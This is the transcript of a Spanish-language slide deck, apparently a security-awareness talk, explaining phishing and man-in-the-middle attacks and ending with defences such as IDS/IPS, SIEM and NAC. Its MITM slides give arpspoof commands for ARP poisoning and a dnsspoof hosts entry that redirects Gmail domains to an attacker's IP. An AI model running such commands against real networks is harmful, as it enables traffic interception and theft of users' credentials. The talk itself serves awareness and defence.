Innovacion, si pero con seguridad
-
Upload
dromerotrejo -
Category
Technology
-
view
92 -
download
5
Transcript of Innovacion, si pero con seguridad
¿Quieres que adivine la contraseña de tu correo electrónico?
David RomeroConsultor Técnico
¿Qué es el Phishing?
Es el intento o acción de conseguir información sensible como nombres de usuario, contraseñas, tarjetas de crédito (y algunas veces indirectamente dinero) con fines maliciosos, suplantando la identidad en las comunicaciones electrónicas.
Ejemplos de Phishing
Ejemplos de Phishing
MITM: Man In The Middle
Es un ataque donde el atacante intercepta la comunicación de la víctima, sin su consentimiento y sin su conocimiento, para alterar la comunicación con fines maliciosos o para espiar la comunicación obteniendo información sensible.
MITM: Herramientasarpspoof
arpspoof i eth0 t 10.0.0.1 10.0.0.7arpspoof i eth0 t 10.0.0.7 10.0.0.1
MITM: Herramientasdnsspoof
# dnsspoof i eth0 f /etc/dnsspoof.hosts# Ejemplo fichero dnsspoof.hosts ip_atacante *.gmail.com
Escenario Práctico
Caso Práctico
¿Cómo nos protegemos?Sistemas de detección y protección de intrusos
(IDS/IPS)
¿Cómo nos protegemos?Sistemas de Gestión de Eventos de Seguridad
(SIEM)
¿Cómo nos protegemos?Network Access Control
(NAC)
¿Cómo nos protegemos?Concienciación del usuario
¿Cómo nos protegemos?Cuenta con profesionales